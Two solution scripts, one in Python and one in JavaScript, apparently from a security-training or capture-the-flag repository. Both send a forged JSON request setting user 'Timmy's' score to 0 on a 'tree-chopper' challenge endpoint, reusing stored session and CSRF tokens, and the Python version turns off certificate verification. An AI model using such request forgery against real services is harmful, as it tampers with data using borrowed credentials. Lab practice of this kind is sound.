File: SC-Mimosa/JavaScript/Tree Chopper/solve.py
import requests
import sys

sys.path.append("../../") # danger danger, do not change!! (secrets will break)

from Secrets.csrf import CSRF_KEY, CSRF_VALUE
from Secrets.session import SESSION_KEY, SESSION_VALUE

# Disable SSL warnings (mimosa uses a self-signed certificate)
requests.packages.urllib3.disable_warnings()

# Constants
URL = "https://mimosadism.dmit.local/challenges/tree-chopper"

headers = {
    CSRF_KEY: CSRF_VALUE,
}

cookies = {
    SESSION_KEY: SESSION_VALUE,
}

data = {
    "username":"Timmy",
    "score":0
}

try:
    response = requests.post(URL, headers=headers, cookies=cookies, json=data, verify=False)
    print(response.text)

except requests.RequestException as e:
    print(f"Request failed: {e}")

File: SC-Mimosa/JavaScript/Tree Chopper/solve.js
$.ajax({
    url: "/challenges/tree-chopper",
    type: "post",
    data: JSON.stringify({
        username: "Timmy",
        score: 0,
    }),
    contentType: "application/json",
    //CSRF protection
    beforeSend: function (e) {
        e.setRequestHeader(_csrf_header, _csrf_token);
    },
    success: function (e, t, n) {
        "function" == typeof window.default_challenge_success &&
            window.default_challenge_success(e);
    },
    error: function (e, t, n) {
        "function" == typeof window.default_challenge_error &&
            window.default_challenge_error(n);
    },
});